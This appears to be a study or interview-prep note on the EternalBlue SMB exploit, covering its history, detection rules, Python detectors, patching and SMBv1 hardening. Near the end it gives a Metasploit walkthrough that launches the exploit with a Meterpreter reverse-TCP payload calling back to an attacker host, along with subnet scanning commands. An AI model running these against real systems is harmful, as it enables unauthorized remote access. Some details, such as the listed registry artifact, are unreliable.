EternalBlue
One-liner: NSA-developed exploit for Windows SMB vulnerability (CVE-2017-0144) leaked by Shadow Brokers, used by WannaCry and NotPetya.
🎯 What Is It?
EternalBlue is a sophisticated exploit developed by the NSA's Equation Group that targets a critical vulnerability in Microsoft's Server Message Block (SMB) protocol. It allows remote code execution without authentication, enabling attackers to gain SYSTEM-level access and spread malware across networks. It became infamous after being leaked and weaponized in the WannaCry ransomware outbreak.
🐛 The Vulnerability
CVE-2017-0144
- Product: Windows SMBv1 (Server Message Block version 1)
- Type: Remote Code Execution (RCE)
- CVSS Score: 9.3 (Critical)
- Affected Systems:
  - Windows XP
  - Windows Vista
  - Windows 7
  - Windows 8
  - Windows 10 (pre-patch)
  - Windows Server 2003-2016
Technical Root Cause
Buffer overflow in the SMBv1 protocol handler:
- Vulnerability: improper handling of specially crafted SMBv1 transaction packets
- Location: srv.sys (the kernel-mode SMB server driver)
- Impact: kernel memory corruption → RCE as SYSTEM
The vulnerability lies in how Windows handles SMB packets with malformed transaction requests: the crafted requests overflow a kernel buffer, and because srv.sys runs in kernel mode, the attacker's code executes in kernel space with SYSTEM privileges.
⏱️ Timeline
| Date | Event |
|---|---|
| Pre-2013 | NSA develops EternalBlue exploit |
| 2013-2016 | NSA uses EternalBlue for intelligence operations |
| Aug 2016 | Shadow Brokers steal NSA tools (claimed) |
| March 14, 2017 | Microsoft releases patch MS17-010 |
| April 14, 2017 | Shadow Brokers publicly release EternalBlue |
| May 12, 2017 | WannaCry outbreak using EternalBlue |
| June 27, 2017 | NotPetya outbreak using EternalBlue |
| 2017-Present | EternalBlue still actively exploited |
🛠️ How EternalBlue Works
Exploitation Flow
1. Attacker scans for SMB (port 445)
2. Send specially crafted SMB packets
3. Trigger buffer overflow in srv.sys
4. Overwrite kernel memory
5. Execute shellcode as SYSTEM
6. Install backdoor (DoublePulsar)
7. Deploy payload (ransomware, etc.)
Technical Details
Stage 1: Initial Exploit Packets
SMB_COM_TRANSACTION2 request with:
- Large buffer size (0xFFFF)
- Malformed parameters
- Heap grooming payloads
Stage 2: Shellcode Injection
- Exploit sprays kernel heap with shellcode
- Overwrites kernel HAL (Hardware Abstraction Layer) pointers
- Redirects execution to attacker-controlled code
Stage 3: Payload Delivery
- Often paired with DoublePulsar backdoor
- Installs persistent access
- Deploys final payload (ransomware, cryptominer, etc.)
🔥 Notable Attacks Using EternalBlue
1. WannaCry (May 2017)
- Impact: 300,000+ systems in 150 countries
- Damage: $4 billion+
- Vector: EternalBlue worm propagation
- Attacker: North Korea (Lazarus Group)
2. NotPetya (June 2017)
- Impact: $10 billion+ damages (widely cited as the most costly cyberattack to date)
- Victims: Maersk, Merck, FedEx, Mondelez
- Vector: EternalBlue + MeDoc software supply chain
- Attacker: Russia (attributed)
3. Cryptominers (2017-Present)
- EternalMiner, Adylkuzz
- Silently mine cryptocurrency on infected systems
4. Emotet / TrickBot (2018-2020)
- Banking trojans using EternalBlue for Lateral Movement
🔍 Detection
Network Detection
Snort Rule:
```
# Coarse signature: |FF|SMB is the SMBv1 magic and 0x2F is SMB_COM_WRITE_ANDX,
# so this fires on SMBv1 Write AndX traffic in general; tune it to your
# environment and pair it with the vendor MS17-010 signatures.
alert tcp any any -> any 445 ( \
    msg:"EternalBlue Exploit Attempt"; \
    flow:to_server,established; \
    content:"|FF|SMB"; \
    content:"|2F 00 00 00 00|"; \
    classtype:attempted-admin; \
    sid:1000001; \
    rev:1; \
)
```
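To make the Snort content matches concrete, here is an added example (not from the original notes) that parses the NetBIOS session framing and SMB header of a frame, identifies the dialect and command, and reports defender-side findings: any SMBv1 at all once it has been disabled, SMBv1 transaction-family commands, and the byte pattern the rule above matches. The sample frames are constructed by hand, not captured traffic.

```python
"""Classify SMB frames by dialect and command (added example, not from the original notes).
Sample frames are constructed; |FF|SMB is the SMBv1 magic and the next byte is the command."""
import struct
SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
# SMBv1 command codes (MS-CIFS); the transaction family carries EternalBlue's payload
SMB1_COMMANDS = {0x25: "SMB_COM_TRANSACTION", 0x26: "SMB_COM_TRANSACTION_SECONDARY",
                 0x2F: "SMB_COM_WRITE_ANDX", 0x32: "SMB_COM_TRANSACTION2",
                 0x33: "SMB_COM_TRANSACTION2_SECONDARY", 0x72: "SMB_COM_NEGOTIATE",
                 0xA0: "SMB_COM_NT_TRANSACT", 0xA1: "SMB_COM_NT_TRANSACT_SECONDARY"}
TRANSACTION_FAMILY = {0x25, 0x26, 0x32, 0x33, 0xA0, 0xA1}

def parse_frame(frame: bytes) -> dict:
    """Parse NetBIOS session framing (type 0x00 + 3-byte length) and the SMB header."""
    if (len(frame) < 36 or frame[0] != 0x00
            or int.from_bytes(frame[1:4], "big") != len(frame) - 4):
        return {"dialect": "unknown"}
    body = frame[4:]
    if body[:4] == SMB2_MAGIC:  # SMB2: ProtocolId(4) StructureSize(2) CreditCharge(2) Status(4) Command(2)
        return {"dialect": "SMB2+", "command": struct.unpack_from("<H", body, 12)[0]}
    if body[:4] != SMB1_MAGIC:
        return {"dialect": "unknown"}
    # SMB1 header: Protocol(4) Command(1) Status(4) Flags(1) Flags2(2) ... 32 bytes total
    command, status = struct.unpack_from("<BI", body, 4)
    return {"dialect": "SMB1", "command": command, "nt_status": status,
            "command_name": SMB1_COMMANDS.get(command, "0x%02X" % command)}

def alerts_for(frame: bytes) -> list:
    """Defender-side findings for one frame; an empty list means nothing to report."""
    info = parse_frame(frame)
    alerts = []
    if info["dialect"] == "SMB1":
        alerts.append("SMBv1 in use: should be disabled per MS17-010 guidance")
        if info["command"] in TRANSACTION_FAMILY:
            alerts.append("SMBv1 transaction-family command " + info["command_name"])
        if info["command"] == 0x2F and info["nt_status"] == 0:
            alerts.append("matches Snort content |FF|SMB followed by |2F 00 00 00 00|")
    return alerts

def nb_frame(body: bytes) -> bytes:
    return b"\x00" + len(body).to_bytes(3, "big") + body  # NetBIOS session header (constructed)

def smb1_frame(command: int, status: int = 0) -> bytes:
    """Minimal 32-byte SMBv1 header plus empty WordCount/ByteCount (constructed test input)."""
    hdr = SMB1_MAGIC + struct.pack("<BIBHH8sHHHHH", command, status, 0x18, 0xC807,
                                   0, bytes(8), 0, 0, 0, 0, 0)
    return nb_frame(hdr + b"\x00\x00\x00")

def smb2_frame(command: int) -> bytes:
    return nb_frame(SMB2_MAGIC + struct.pack("<HHIH", 64, 0, 0, command) + bytes(50))  # 64-byte SMB2 header
```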
Sysmon Detection
```
# Event ID 3 (Network Connection): kernel-initiated outbound SMB.
# The kernel stage shows Image=System; a user-mode worm shows its own executable.
EventID: 3
Image: System
DestinationPort: 445
Initiated: true

# Event ID 6 (Driver Load): srv.sys is always Microsoft-signed on a healthy host,
# so anything unsigned or oddly signed loading under that name is suspicious.
EventID: 6
ImageLoaded: *\srv.sys
Signature: Suspicious or unsigned
```
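The Event ID 3 pattern above is only useful once it is aggregated: a single SMB connection from the kernel is normal, while one host opening port 445 to dozens of distinct neighbours within a minute is the worm-propagation signature behind the "port 445 scanning" correlation rule. The following added example (not from the original notes) implements that sliding-window fan-out check over Sysmon events exported as JSON lines; the sample records are constructed, not real telemetry.

```python
"""Sliding-window fan-out detector for outbound SMB (TCP/445) in Sysmon Event ID 3 records.
Added example, not from the original notes; the JSON lines below are constructed, not real telemetry."""
import json
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_EVENTS = "\n".join(
    # WS01: the kernel ("System") reaches 12 distinct hosts on 445 within 22 s
    [json.dumps({"EventID": 3, "Computer": "WS01", "Image": "System",
                 "UtcTime": "2017-05-12 10:00:%02d.000" % (2 * i),
                 "DestinationIp": "10.0.0.%d" % (10 + i),
                 "DestinationPort": 445, "Initiated": "true"}) for i in range(12)]
    # WS02: a user's shell mapping three file servers, benign
    + [json.dumps({"EventID": 3, "Computer": "WS02", "Image": "C:\\Windows\\explorer.exe",
                   "UtcTime": "2017-05-12 10:00:%02d.000" % i,
                   "DestinationIp": "10.0.1.%d" % (20 + i),
                   "DestinationPort": 445, "Initiated": "true"}) for i in range(3)]
    # an HTTPS connection on WS01 that the detector must ignore
    + [json.dumps({"EventID": 3, "Computer": "WS01", "Image": "System",
                   "UtcTime": "2017-05-12 10:00:05.000", "DestinationIp": "10.0.0.99",
                   "DestinationPort": 443, "Initiated": "true"})])

def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")  # Sysmon UtcTime format

def find_smb_fanout(jsonl: str, window_seconds: int = 60, threshold: int = 10) -> dict:
    """Map (Computer, Image) -> peak number of distinct 445 destinations inside any
    window_seconds span, for pairs that reach threshold. Keyed per image rather than
    filtered to Image=System: kernel-stage traffic appears as System, but a user-mode
    worm process shows its own executable and must not be filtered out."""
    by_key = defaultdict(list)
    for line in jsonl.splitlines():
        e = json.loads(line)
        if (e.get("EventID") == 3 and int(e.get("DestinationPort", 0)) == 445
                and str(e.get("Initiated")).lower() == "true"):
            by_key[(e["Computer"], e["Image"])].append((_ts(e["UtcTime"]), e["DestinationIp"]))
    hits = {}
    for key, conns in by_key.items():
        conns.sort()
        window = deque()  # (time, ip) pairs no older than window_seconds
        peak = 0
        for t, ip in conns:
            window.append((t, ip))
            while (t - window[0][0]).total_seconds() > window_seconds:
                window.popleft()
            peak = max(peak, len({w_ip for _, w_ip in window}))
        if peak >= threshold:
            hits[key] = peak
    return hits
```

Tune window_seconds and threshold against a baseline of your own file-server traffic; backup agents and vulnerability scanners legitimately fan out on 445 and belong on an allow-list keyed by Image.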
EDR Indicators
- Unusual SMB traffic patterns
- srv.sys crashes (BSOD) or kernel memory corruption events
- DoublePulsar implant (rundll32 SMB payload injection)
Exploitation Artifacts
Registry:
- HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableICMPRedirect
Files:
- Unusual DLLs in %SystemRoot%
- Temp files containing shellcode
Memory:
- Kernel heap spray signatures
- [[DoublePulsar]] XOR key 0x75A31CF2
🛡️ Prevention & Mitigation
1. Patch Immediately
MS17-010 (March 2017)
```powershell
# Check whether one of the MS17-010 KBs is installed. The KB number differs per OS,
# and on Windows 10 the fix ships in cumulative updates, so a later cumulative KB
# may be present instead of the ones listed here.
$ms17010 = @("KB4012212", "KB4012215", "KB4012213", "KB4012214",
             "KB4012217", "KB4012216", "KB4013198", "KB4013429")
Get-HotFix | Where-Object { $_.HotFixID -in $ms17010 } | Select-Object HotFixID, InstalledOn
```
Microsoft released emergency patches even for unsupported systems (XP, Server 2003).
2. Disable SMBv1
```powershell
# Disable the SMBv1 server. This cmdlet exists on Windows 8 / Server 2012 and later;
# on Windows 7 / 2008 R2 SMBv1 is disabled via the LanmanServer\Parameters\SMB1 registry value.
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Verify
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
```
3. Firewall Rules
Block SMB externally:
```bash
# Block inbound port 445 (SMB) on a Linux host or gateway
iptables -A INPUT -p tcp --dport 445 -j DROP
```
```powershell
# Windows Firewall: block inbound SMB
New-NetFirewallRule -DisplayName "Block SMB" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block
```
4. Network Segmentation
- Isolate critical systems
- Prevent Lateral Movement
- Segment OT/ICS networks
5. IPS / EDR
- Detect exploitation attempts
- Block malicious SMB packets
6. Monitor SMB Traffic
- Unusual port 445 activity
- SMB traffic to unexpected hosts
🔬 Testing for Vulnerability
Metasploit Scanner
```
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
```
Nmap NSE Script
```bash
nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24
```
Manual Check
```
# Check if patch installed
wmic qfe list | findstr KB4012212
```
🏆 Metasploit Exploitation
```
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Target OS: Windows 7 Professional 7601 Service Pack 1
[*] Sending stage (200774 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened
```
🎯 Why It's Still a Threat (2025)
Despite patch availability since 2017:
- Legacy systems still unpatched
- IoT devices running embedded Windows
- Air-gapped networks never updated
- ICS/SCADA systems can't be patched easily
- 30%+ of internet-facing SMB still vulnerable (Shodan)
```bash
# Shodan query for internet-exposed Windows SMB hosts (exposure, not confirmed vulnerability)
shodan search "port:445 os:windows"
```
🎤 Interview Angles
Q: What is EternalBlue and why is it significant?
- NSA-developed exploit for Windows SMB (CVE-2017-0144)
- Leaked by Shadow Brokers in April 2017
- Enabled WannaCry (300K+ systems) and NotPetya ($10B+ damage)
- Remote code execution as SYSTEM without authentication
- Still actively exploited despite patch availability since March 2017
Q: How would you detect EternalBlue exploitation in your network?
STAR Example:
Situation: Need to detect EternalBlue attempts after WannaCry outbreak.
Task: Implement detection across network and endpoints.
Action:
- Deployed Snort IPS rules for malformed SMB packets
- Configured Sysmon to alert on srv.sys crashes and unusual SMB activity
- Created Splunk correlation rule: port 445 scanning + srv.sys events
- Scanned network with Nmap for vulnerable systems
Result: Detected 12 vulnerable systems, patched immediately; blocked 3 external exploitation attempts in first month.
Q: Why is EternalBlue still a threat years later?
- Legacy systems (XP, Server 2003) still deployed
- ICS/SCADA environments can't patch without downtime
- Air-gapped networks never receive updates
- SMBv1 still enabled by default on many systems
- 30%+ of internet-facing SMB endpoints remain vulnerable
🔗 Related Concepts
- CVE-2017-0144 — The SMB vulnerability
- WannaCry — Famous ransomware outbreak
- Shadow Brokers — Leak source
- Malware Analysis — Analyzing exploits
- Lateral Movement — Post-exploitation use
- Metasploit — Exploitation framework